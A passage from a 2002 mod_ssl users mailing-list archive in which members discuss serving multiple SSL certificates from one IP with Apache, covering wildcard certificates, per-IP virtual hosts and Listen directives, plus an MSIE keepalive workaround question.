	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gA5ALrt9023425
	for ; Tue, 5 Nov 2002 11:21:53 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gA5ALqEm026138
	for ; Tue, 5 Nov 2002 11:21:52 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Configuring Multiple Certicates SSL over an unique IP
Date: Tue, 5 Nov 2002 11:21:52 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A4A9@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Configuring Multiple Certicates SSL over an unique IP
Thread-Index: AcKEq0gfp+jBhmAwQTm4/E3Nkdhy+gACdEdA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes indeed, although this is a rather limited case of NBVH.

-----Original Message-----
From: ueli@heuer.org [mailto:ueli@heuer.org]
Sent: Dienstag, 5. November 2002 10:08
To: modssl-users@modssl.org
Subject: Re: Configuring Multiple Certicates SSL over an unique IP


On Tue, 5 Nov 2002 08:48:58 +0100
"Boyle Owen"  wrote:

> No. This is called name-based virtual hosting (NBVH). It works fine
for
> plain HTTP but is impossible under SSL.
> 
> The reason is that NBVH uses the "Host" header to find the VH. But in
> SSL, the connection must be established *before* you get the Host
> header. So the server cannot decide which VH to use. 

except you are using a star-certificate, 

if your certificate is *.foo.bar you can use name-based virtual hosting
for
following dhosts:

www.foo.bar
test.foo.bar 
new.foo.bar
...
what-ever.foo.bar


> 
> Rgds,
> 
> Owen Boyle 
> 
> -----Original Message-----
> From: asom@vetorialnet.com.br [mailto:asom@vetorialnet.com.br]
> Sent: Montag, 4. November 2002 23:20
> To: modssl-users@modssl.org
> Subject: Configuring Multiple Certicates SSL over an unique IP
> 
> 
> 
> Hello,
> 
>  There are some way to configuring the Apache Server to utilize
multiple
> certificates SSL, over an unique ip, once for each virtual domain ?
> 
>  What the Apache configure sintax ?
> 
> Alex Moraes
> 
-- 
"The software said it requires Windows 95 or better,
                                                 so I installed Linux"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 14:19:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA22816; Tue, 5 Nov 2002 14:18:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0017.ix.itaction.net id OAA22805; Tue, 5 Nov 2002 14:17:11 +0100 (MET)
Received: from localhost ([127.0.0.1] helo=it0033.it-action.com)
	by mx02.itaction.net with esmtp (Exim 4.05)
	id 1893Zq-0002wG-00
	for modssl-users@modssl.org; Tue, 05 Nov 2002 13:17:06 +0000
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H53U8H00.1CC for ; Tue, 5 Nov 2002
          13:17:05 +0000 
Message-ID: <3DC7C4CD.3030105@itaction.co.uk>
Date: Tue, 05 Nov 2002 13:17:01 +0000
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Configuring Multiple Certicates SSL over an unique IP
References: <1036448412.3dc6f29ceefa2@webmail.vetorialnet.com.br>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm thinking you need to use Virtual Host directives - as others have 
replied, you already know that NameVirtualHost wont help - so you need 
to put each virtual host on a different IP. (or different port if no 
spare IP's_).

firstly - configure your operating system to receive all the ip's you 
want to use - usually via ip-aliases - something you can do in unix and 
windows, but dont ask me how in windows.

an example:

your real ip is 192.168.1.2 , and you set up 192.168.1.3  as an extra alias.

I'm assuming you started with httpd.conf as provided with mod_ssl - this 
should have the basic SSL configuration bits.

Then in your httpd.conf near the end, in the  section, 
create a VHost for each cert/ip you want.


        ServerName www.cert1domain.com
        SSLCertificateKeyFile conf/ssl.key/cert1.key
        SSLCertificateFile conf/ssl.crt/cert1.crt
        SSLEngine on
        ...other conf...



        ServerName www.cert2domain.com
        SSLCertificateKeyFile conf/ssl.key/cert2.key
        SSLCertificateFile conf/ssl.crt/cert2.crt
        SSLEngine on
        ...other conf...



asom@vetorialnet.com.br wrote:

>Hello,
>
> There are some way to configuring the Apache Server to utilize multiple 
>certificates SSL, over an unique ip, once for each virtual domain ?
>
> What the Apache configure sintax ?
>
>Alex Moraes
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 14:29:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA23032; Tue, 5 Nov 2002 14:28:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id OAA23023; Tue, 5 Nov 2002 14:27:09 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gA5DQxt9018529
	for ; Tue, 5 Nov 2002 14:26:59 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gA5DQwEm003599
	for ; Tue, 5 Nov 2002 14:26:58 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Configuring Multiple Certicates SSL over an unique IP
Date: Tue, 5 Nov 2002 14:26:58 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A4AE@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Configuring Multiple Certicates SSL over an unique IP
Thread-Index: AcKEzhZ/jZ3P89VZSJKTbUHFHjSJmQAALkuw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Don't forget:

Listen 192.168.1.2:443 
Listen 192.168.1.3:443

-----Original Message-----
From: Peter Viertel [mailto:peter.viertel@itaction.co.uk]
Sent: Dienstag, 5. November 2002 14:17
To: modssl-users@modssl.org
Subject: Re: Configuring Multiple Certicates SSL over an unique IP


I'm thinking you need to use Virtual Host directives - as others have 
replied, you already know that NameVirtualHost wont help - so you need 
to put each virtual host on a different IP. (or different port if no 
spare IP's_).

firstly - configure your operating system to receive all the ip's you 
want to use - usually via ip-aliases - something you can do in unix and 
windows, but dont ask me how in windows.

an example:

your real ip is 192.168.1.2 , and you set up 192.168.1.3  as an extra
alias.

I'm assuming you started with httpd.conf as provided with mod_ssl - this
should have the basic SSL configuration bits.

Then in your httpd.conf near the end, in the  section, 
create a VHost for each cert/ip you want.


        ServerName www.cert1domain.com
        SSLCertificateKeyFile conf/ssl.key/cert1.key
        SSLCertificateFile conf/ssl.crt/cert1.crt
        SSLEngine on
        ...other conf...



        ServerName www.cert2domain.com
        SSLCertificateKeyFile conf/ssl.key/cert2.key
        SSLCertificateFile conf/ssl.crt/cert2.crt
        SSLEngine on
        ...other conf...



asom@vetorialnet.com.br wrote:

>Hello,
>
> There are some way to configuring the Apache Server to utilize
multiple 
>certificates SSL, over an unique ip, once for each virtual domain ?
>
> What the Apache configure sintax ?
>
>Alex Moraes
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 15:01:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA24612; Tue, 5 Nov 2002 15:00:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from inetrelay.experian.nl id OAA24472; Tue, 5 Nov 2002 14:59:54 +0100 (MET)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by inetrelay.experian.nl (Postfix) with ESMTP id 9B79A6CA89
	for ; Tue,  5 Nov 2002 14:59:53 +0100 (CET)
Received: from shivaya.namah.om (unknown [10.200.3.17])
	by inetrelay.experian.nl (Postfix) with SMTP id 3BFAF2EED
	for ; Tue,  5 Nov 2002 14:59:52 +0100 (CET)
Date: Tue, 5 Nov 2002 15:05:58 +0100
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: Page cannot be displayed
Message-Id: <20021105150558.32ba4a03.jeroen@experian.nl>
Organization: Experian nederland b.v.
X-Mailer: Sylpheed version 0.7.5 (GTK+ 1.2.10; i586-mandrake-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by Experian Advanced Mail Virusscanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

We are working with apache-1.3.23 and mod_ssl-2.8.7,
sometimes explorer says:

"This page contains both secure and nonsecure items. Do you want to display the nonsecure items?"

While everything on the page is secure, when answering yes, we always get a 'page cannot be displayed'

The problem did not occur anymore when we did the following in out vhost configuration:

SetEnvIf User-Agent ".*MSIE.*" \
          nokeepalive ssl-unclean-shutdown \
          downgrade-1.0 force-response-1.0

question:

is downgrading to 1.0 really the solution, and what is causing this in the first place?

Cheers,
Jeroen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 15:57:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA26853; Tue, 5 Nov 2002 15:56:22 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from comal.uanet.edu id PAA26825; Tue, 5 Nov 2002 15:56:04 +0100 (MET)
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Subject: RE: Configuring Multiple Certicates SSL over an unique IP
Date: Tue, 5 Nov 2002 09:55:58 -0500
Message-ID: <4EAB3F5D46284A408F6A998255B1188186B040@COMAL.uanet.edu>
Thread-Topic: Configuring Multiple Certicates SSL over an unique IP
Thread-Index: AcKEq0gfp+jBhmAwQTm4/E3Nkdhy+gACdEdAAAmTqwA=
From: "Hunt,Keith A" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAB26827
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hunt,Keith A" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

How does one go about getting a star certificate?

> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com] 
> Sent: Tuesday, November 05, 2002 5:22 AM
> To: modssl-users@modssl.org
> Subject: RE: Configuring Multiple Certicates SSL over an unique IP
> 
> 
> Yes indeed, although this is a rather limited case of NBVH.
> 
> -----Original Message-----
> From: ueli@heuer.org [mailto:ueli@heuer.org]
> Sent: Dienstag, 5. November 2002 10:08
> To: modssl-users@modssl.org
> Subject: Re: Configuring Multiple Certicates SSL over an unique IP
> 
> 
> On Tue, 5 Nov 2002 08:48:58 +0100
> "Boyle Owen"  wrote:
> 
> > No. This is called name-based virtual hosting (NBVH). It works fine
> for
> > plain HTTP but is impossible under SSL.
> > 
> > The reason is that NBVH uses the "Host" header to find the 
> VH. But in 
> > SSL, the connection must be established *before* you get the Host 
> > header. So the server cannot decide which VH to use.
> 
> except you are using a star-certificate, 
> 
> if your certificate is *.foo.bar you can use name-based 
> virtual hosting for following dhosts:
> 
> www.foo.bar
> test.foo.bar 
> new.foo.bar
> ...
> what-ever.foo.bar
> 
> 
> > 
> > Rgds,
> > 
> > Owen Boyle
> > 
> > -----Original Message-----
> > From: asom@vetorialnet.com.br [mailto:asom@vetorialnet.com.br]
> > Sent: Montag, 4. November 2002 23:20
> > To: modssl-users@modssl.org
> > Subject: Configuring Multiple Certicates SSL over an unique IP
> > 
> > 
> > 
> > Hello,
> > 
> >  There are some way to configuring the Apache Server to utilize
> multiple
> > certificates SSL, over an unique ip, once for each virtual domain ?
> > 
> >  What the Apache configure sintax ?
> > 
> > Alex Moraes
> > 
> -- 
> "The software said it requires Windows 95 or better,
>                                                  so I 
> installed Linux" 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> This message is for the named person's use only. It may 
> contain confidential, proprietary or legally privileged 
> information. No confidentiality or privilege is waived or 
> lost by any mistransmission. If you receive this message in 
> error, please notify the sender urgently and then immediately 
> delete the message and any copies of it from your system. 
> Please also immediately destroy any hardcopies of the 
> message. You must not, directly or indirectly, use, disclose, 
> distribute, print, or copy any part of this message if you 
> are not the intended recipient. The sender's company reserves 
> the right to monitor all e-mail communications through their 
> networks. Any views expressed in this message are those of 
> the individual sender, except where the message states 
> otherwise and the sender is authorised to state them to be 
> the views of the sender's company. 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 16:10:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA28130; Tue, 5 Nov 2002 16:09:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id QAA28114; Tue, 5 Nov 2002 16:08:40 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gA5F7sq30331
	for ; Tue, 5 Nov 2002 15:07:59 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 5 Nov 2002 15:07:48 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F22B6@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Configuring Multiple Certicates SSL over an unique IP
Date: Tue, 5 Nov 2002 15:07:49 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Only Thawte do starred certificates, www.thawte.com, however they are now
fairly restrictive on allowing them. You have to contact a representative
first (ie you can no longer get them online).

We are probably not going to bother renewing our current one because they
are now too much hassle.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If we could learn one thing from September 11th 2001, it would be the utter
absurdity of moral relativism.


> -----Original Message-----
> From: Hunt,Keith A [mailto:keith@uakron.edu]
> Sent: 05 November 2002 14:56
> To: modssl-users@modssl.org
> Subject: RE: Configuring Multiple Certicates SSL over an unique IP
> 
> 
> How does one go about getting a star certificate?
> 
> > -----Original Message-----
> > From: Boyle Owen [mailto:Owen.Boyle@swx.com] 
> > Sent: Tuesday, November 05, 2002 5:22 AM
> > To: modssl-users@modssl.org
> > Subject: RE: Configuring Multiple Certicates SSL over an unique IP
> > 
> > 
> > Yes indeed, although this is a rather limited case of NBVH.
> > 
> > -----Original Message-----
> > From: ueli@heuer.org [mailto:ueli@heuer.org]
> > Sent: Dienstag, 5. November 2002 10:08
> > To: modssl-users@modssl.org
> > Subject: Re: Configuring Multiple Certicates SSL over an unique IP
> > 
> > 
> > On Tue, 5 Nov 2002 08:48:58 +0100
> > "Boyle Owen"  wrote:
> > 
> > > No. This is called name-based virtual hosting (NBVH). It 
> works fine
> > for
> > > plain HTTP but is impossible under SSL.
> > > 
> > > The reason is that NBVH uses the "Host" header to find the 
> > VH. But in 
> > > SSL, the connection must be established *before* you get the Host 
> > > header. So the server cannot decide which VH to use.
> > 
> > except you are using a star-certificate, 
> > 
> > if your certificate is *.foo.bar you can use name-based 
> > virtual hosting for following dhosts:
> > 
> > www.foo.bar
> > test.foo.bar 
> > new.foo.bar
> > ...
> > what-ever.foo.bar
> > 
> > 
> > > 
> > > Rgds,
> > > 
> > > Owen Boyle
> > > 
> > > -----Original Message-----
> > > From: asom@vetorialnet.com.br [mailto:asom@vetorialnet.com.br]
> > > Sent: Montag, 4. November 2002 23:20
> > > To: modssl-users@modssl.org
> > > Subject: Configuring Multiple Certicates SSL over an unique IP
> > > 
> > > 
> > > 
> > > Hello,
> > > 
> > >  There are some way to configuring the Apache Server to utilize
> > multiple
> > > certificates SSL, over an unique ip, once for each 
> virtual domain ?
> > > 
> > >  What the Apache configure sintax ?
> > > 
> > > Alex Moraes
> > > 
> > -- 
> > "The software said it requires Windows 95 or better,
> >                                                  so I 
> > installed Linux" 
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> This message is for the named person's use only. It may 
> contain confidential, proprietary or legally privileged 
> information. No confidentiality or privilege is waived or 
> lost by any mistransmission. If you receive this message in 
> error, please notify the sender urgently and then immediately 
> delete the message and any copies of it from your system. 
> Please also immediately destroy any hardcopies of the 
> message. You must not, directly or indirectly, use, disclose, 
> distribute, print, or copy any part of this message if you 
> are not the intended recipient. The sender's company reserves 
> the right to monitor all e-mail communications through their 
> networks. Any views expressed in this message are those of 
> the individual sender, except where the message states 
> otherwise and the sender is authorised to state them to be 
> the views of the sender's company. 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  5 18:11:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA02328; Tue, 5 Nov 2002 18:10:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id SAA02312; Tue, 5 Nov 2002 18:09:57 +0100 (MET)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82])
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id gA5H9d9a017523
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Tue, 5 Nov 2002 12:09:46 -0500
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id gA5H9Tcs010874
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Tue, 5 Nov 2002 12:09:33 -0500
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id gA5H9Ih5010868
	for ; Tue, 5 Nov 2002 12:09:26 -0500
To: modssl-users@modssl.org
Subject: Re: Configuring Multiple Certicates SSL over an unique IP 
References: <484A6CA492BE654395D208B1D8D5393973A4A2@SOMEXEVS001.ex.ordersx.org>
In-reply-to: Your message of "Tue, 05 Nov 2002 08:48:58 +0100".
	 <484A6CA492BE654395D208B1D8D5393973A4A2@SOMEXEVS001.ex.ordersx.org> 
From: Harald Koch 
Date: Tue, 05 Nov 2002 12:09:13 -0500
Message-ID: <10867.1036516153@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Of all the gin joints in all the towns in all the world, "Boyle Owen"
had to walk into mine and say:
> No. This is called name-based virtual hosting (NBVH). It works fine for
> plain HTTP but is impossible under SSL.
> 
> The reason is that NBVH uses the "Host" header to find the VH. But in
> SSL, the connection must be established *before* you get the Host
> header. So the server cannot decide which VH to use. 

A minor tweak: if you can use a single certificate for all of your
virtual hosts, then you can name them all in the SubjectAltName
extension of the SSL certificate.


-- 
Harald Koch     

"It takes a child to raze a village."
		-Michael T. Fry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  6 01:25:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA14988; Wed, 6 Nov 2002 01:24:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0017.ix.itaction.net id BAA14984; Wed, 6 Nov 2002 01:24:00 +0100 (MET)
Received: from localhost ([127.0.0.1] helo=it0033.it-action.com)
	by mx02.itaction.net with esmtp (Exim 4.05)
	id 189DzE-0005jf-00
	for modssl-users@modssl.org; Wed, 06 Nov 2002 00:24:00 +0000
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H54P3Y00.UCY for ; Wed, 6 Nov 2002
          00:23:58 +0000 
Message-ID: <3DC8611C.2060604@itaction.co.uk>
Date: Wed, 06 Nov 2002 00:23:56 +0000
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Configuring Multiple Certicates SSL over an unique IP
References: <484A6CA492BE654395D208B1D8D5393973A4AE@SOMEXEVS001.ex.ordersx.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The default:

Listen 443

achieves this already. Is there some advantage to doing separate Listen's?

Boyle Owen wrote:

>Don't forget:
>
>Listen 192.168.1.2:443 
>Listen 192.168.1.3:443
>
>-----Original Message-----
>From: Peter Viertel [mailto:peter.viertel@itaction.co.uk]
>Sent: Dienstag, 5. November 2002 14:17
>To: modssl-users@modssl.org
>Subject: Re: Configuring Multiple Certicates SSL over an unique IP
>
>
>I'm thinking you need to use Virtual Host directives - as others have 
>replied, you already know that NameVirtualHost wont help - so you need 
>to put each virtual host on a different IP. (or different port if no 
>spare IP's_).
>
>firstly - configure your operating system to receive all the ip's you 
>want to use - usually via ip-aliases - something you can do in unix and 
>windows, but dont ask me how in windows.
>
>an example:
>
>your real ip is 192.168.1.2 , and you set up 192.168.1.3  as an extra
>alias.
>
>I'm assuming you started with httpd.conf as provided with mod_ssl - this
>should have the basic SSL configuration bits.
>
>Then in your httpd.conf near the end, in the  section, 
>create a VHost for each cert/ip you want.
>
>
>        ServerName www.cert1domain.com
>        SSLCertificateKeyFile conf/ssl.key/cert1.key
>        SSLCertificateFile conf/ssl.crt/cert1.crt
>        SSLEngine on
>        ...other conf...
>
>
>
>        ServerName www.cert2domain.com
>        SSLCertificateKeyFile conf/ssl.key/cert2.key
>        SSLCertificateFile conf/ssl.crt/cert2.crt
>        SSLEngine on
>        ...other conf...
>
>
>
>asom@vetorialnet.com.br wrote:
>
>  
>
>>Hello,
>>
>>There are some way to configuring the Apache Server to utilize
>>    
>>
>multiple 
>  
>
>>certificates SSL, over an unique ip, once for each virtual domain ?
>>
>>What the Apache configure sintax ?
>>
>>Alex Moraes
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>    
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>This message is for the named person's use only. It may contain
>confidential, proprietary or legally privileged information. No
>confidentiality or privilege is waived or lost by any mistransmission.
>If you receive this message in error, please notify the sender urgently
>and then immediately delete the message and any copies of it from your
>system. Please also immediately destroy any hardcopies of the message.
>You must not, directly or indirectly, use, disclose, distribute, print,
>or copy any part of this message if you are not the intended recipient.
>The sender's company reserves the right to monitor all e-mail
>communications through their networks. Any views expressed in this
>message are those of the individual sender, except where the message
>states otherwise and the sender is authorised to state them to be the
>views of the sender's company. 
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  6 10:08:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA29139; Wed, 6 Nov 2002 10:07:45 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id KAA29118; Wed, 6 Nov 2002 10:06:36 +0100 (MET)
Subject: RE: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
Date: Wed, 6 Nov 2002 10:06:02 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C28573.BB160337"
Message-ID: 
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
X-MS-TNEF-Correlator: 
